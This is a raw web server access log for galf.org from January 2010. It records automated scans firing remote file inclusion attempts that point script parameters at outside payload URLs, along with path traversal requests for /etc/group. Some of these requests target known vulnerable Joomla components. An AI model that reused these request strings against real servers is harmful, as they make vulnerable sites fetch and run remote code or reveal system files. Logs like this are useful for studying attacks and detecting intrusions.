67.19.194.26 - - [18/Jan/2010:02:05:36 -0800] "GET /logs/access_090928.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:05:37 -0800] "GET /logs/access_090629.log///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:05:37 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:05:37 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:05:37 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:05:37 -0800] "GET /logs/access_090928.log///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:05:37 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:05:38 -0800] "GET /logs/access_090629.log///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:05:38 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:05:38 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:05:39 -0800] "GET /logs/access_090921.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:05:41 -0800] "GET /logs/access_090928.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:05:41 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:05:41 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:05:41 -0800] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [18/Jan/2010:02:05:41 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [18/Jan/2010:02:05:41 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [18/Jan/2010:02:05:44 -0800] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [18/Jan/2010:02:05:44 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [18/Jan/2010:02:05:44 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "galf.org"
67.19.194.26 - - [18/Jan/2010:02:05:44 -0800] "GET /logs/access_090921.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:05:44 -0800] "GET /logs/access_090921.log///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:05:52 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:05:52 -0800] "GET /logs/access_090928.log///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:05:52 -0800] "GET /logs/access_090921.log///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:05:52 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:05:54 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:05:54 -0800] "GET /logs/access_090928.log///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:05:54 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:05:55 -0800] "GET /logs/access_090921.log///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:06:03 -0800] "GET /logs/access_090824.log///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:06:03 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:06:03 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:06:06 -0800] "GET /logs/access_100111.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:06:06 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:06:06 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:06:07 -0800] "GET /logs/access_100111.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:06:07 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:06:07 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:06:16 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:06:16 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:06:17 -0800] "GET /logs/access_090921.log///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:06:18 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:06:18 -0800] "GET /logs/access_090629.log///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:06:18 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:06:19 -0800] "GET /logs/access_090824.log///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:06:19 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:06:19 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:06:24 -0800] "GET /logs/access_090921.log///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:06:24 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:06:24 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:06:25 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:06:25 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:06:26 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:06:26 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:06:26 -0800] "GET /logs/access_090928.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:06:26 -0800] "GET /logs/access_091221.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:06:29 -0800] "GET /logs/access_100111.log///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:06:29 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:06:30 -0800] "GET /logs/access_100111.log///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:06:30 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:06:37 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:06:37 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:06:37 -0800] "GET /logs/access_090928.log///?_SERVER[DOCUMENT_ROOT]=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:06:38 -0800] "GET /logs/access_091221.log///?_SERVER[DOCUMENT_ROOT]=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:06:38 -0800] "GET /logs/access_090727.log///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:06:48 -0800] "GET /logs/access_090629.log///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:02:06:54 -0800] "GET /logs/access_090727.log///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:02:06:58 -0800] "GET /logs/access_090629.log///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:02:08:26 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:02:08:26 -0800] "GET /logs/access_090928.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:02:08:26 -0800] "GET /logs/access_090928.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:02:08:26 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:02:08:26 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:02:08:26 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:02:08:27 -0800] "GET /logs/access_090824.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:02:08:27 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:02:08:27 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:02:08:27 -0800] "GET /logs/access_090928.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:02:08:31 -0800] "GET /logs/access_090824.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:02:08:31 -0800] "GET /logs/access_090824.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:02:09:02 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.200.245.35 - - [18/Jan/2010:02:09:40 -0800] "GET /logs/access_090907.log%20/news.php?CONFIG[script_path]=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.200.245.35 - - [18/Jan/2010:02:09:40 -0800] "GET /logs/access_090907.log%20/news.php?CONFIG[script_path]=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
79.170.45.126 - - [18/Jan/2010:02:09:56 -0800] "GET /logs/access.log///ams/amboard/?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
79.170.45.126 - - [18/Jan/2010:02:09:56 -0800] "GET //ams/amboard/?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
79.170.45.126 - - [18/Jan/2010:02:09:56 -0800] "GET /logs///ams/amboard/?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
79.170.45.126 - - [18/Jan/2010:02:10:19 -0800] "GET /logs/access.log///ams/amboard/?_SERVER[DOCUMENT_ROOT]=http://www.derivajewels.nl/logs/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
79.170.45.126 - - [18/Jan/2010:02:10:19 -0800] "GET //ams/amboard/?_SERVER[DOCUMENT_ROOT]=http://www.derivajewels.nl/logs/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
79.170.45.126 - - [18/Jan/2010:02:10:19 -0800] "GET /logs///ams/amboard/?_SERVER[DOCUMENT_ROOT]=http://www.derivajewels.nl/logs/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
79.170.45.126 - - [18/Jan/2010:02:10:31 -0800] "GET /logs///ams/amboard/?_SERVER[DOCUMENT_ROOT]=http://www.derivajewels.nl/logs/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
79.170.45.126 - - [18/Jan/2010:02:10:37 -0800] "GET /logs///ams/amboard/?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.galf.org"
79.170.45.126 - - [18/Jan/2010:02:10:37 -0800] "GET /logs/access.log///ams/amboard/?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.galf.org"
71.6.189.153 - - [18/Jan/2010:02:14:29 -0800] "GET /logs/access.log//////?mosConfig_absolute_path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
71.6.189.153 - - [18/Jan/2010:02:14:29 -0800] "GET /////?mosConfig_absolute_path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 200 1051 "-" "libwww-perl/5.805" "galf.org"
71.6.189.153 - - [18/Jan/2010:02:14:30 -0800] "GET /logs//////?mosConfig_absolute_path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 200 4808 "-" "libwww-perl/5.805" "galf.org"
79.170.45.126 - - [18/Jan/2010:02:14:41 -0800] "GET /logs/access_100111.log///ams/amboard/?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.galf.org"
79.170.45.126 - - [18/Jan/2010:02:15:02 -0800] "GET /logs/access_100111.log///ams/amboard/?_SERVER[DOCUMENT_ROOT]=http://www.derivajewels.nl/logs/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
121.78.118.94 - - [18/Jan/2010:02:15:05 -0800] "GET /logs/access_091102.log/index.php?visualizar=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.118.94 - - [18/Jan/2010:02:15:05 -0800] "GET /index.php?visualizar=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.118.94 - - [18/Jan/2010:02:15:07 -0800] "GET /logs/index.php?visualizar=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [18/Jan/2010:02:15:17 -0800] "GET /logs/access_100111.log///ams/amboard/?_SERVER[DOCUMENT_ROOT]=http://www.derivajewels.nl/logs/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
209.126.254.164 - - [18/Jan/2010:02:22:36 -0800] "GET /skin/ggambo7002_board/setup.php?dir=http://www.noin9191.com/ams/ammember/rfi1.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:02:23:07 -0800] "GET /logs/access_090928.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:02:23:38 -0800] "GET /logs/access_090928.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:02:24:00 -0800] "GET /logs/access_090928.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:02:24:14 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:02:24:53 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.6.189.153 - - [18/Jan/2010:02:25:06 -0800] "GET /logs/access_100111.log//////?mosConfig_absolute_path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
71.6.189.153 - - [18/Jan/2010:02:25:07 -0800] "GET /////?mosConfig_absolute_path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 200 1051 "-" "libwww-perl/5.805" "www.galf.org"
71.6.189.153 - - [18/Jan/2010:02:25:07 -0800] "GET /logs//////?mosConfig_absolute_path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 200 4808 "-" "libwww-perl/5.805" "www.galf.org"
79.170.45.126 - - [18/Jan/2010:02:28:19 -0800] "GET /logs/access_100111.log///ams/amboard/?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
74.223.143.131 - - [18/Jan/2010:02:29:39 -0800] "GET /logs/access_090706.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [18/Jan/2010:02:29:39 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [18/Jan/2010:02:29:39 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [18/Jan/2010:02:29:42 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [18/Jan/2010:02:29:42 -0800] "GET /logs/access_090706.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [18/Jan/2010:02:29:42 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [18/Jan/2010:02:30:31 -0800] "GET /logs/access_091221.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
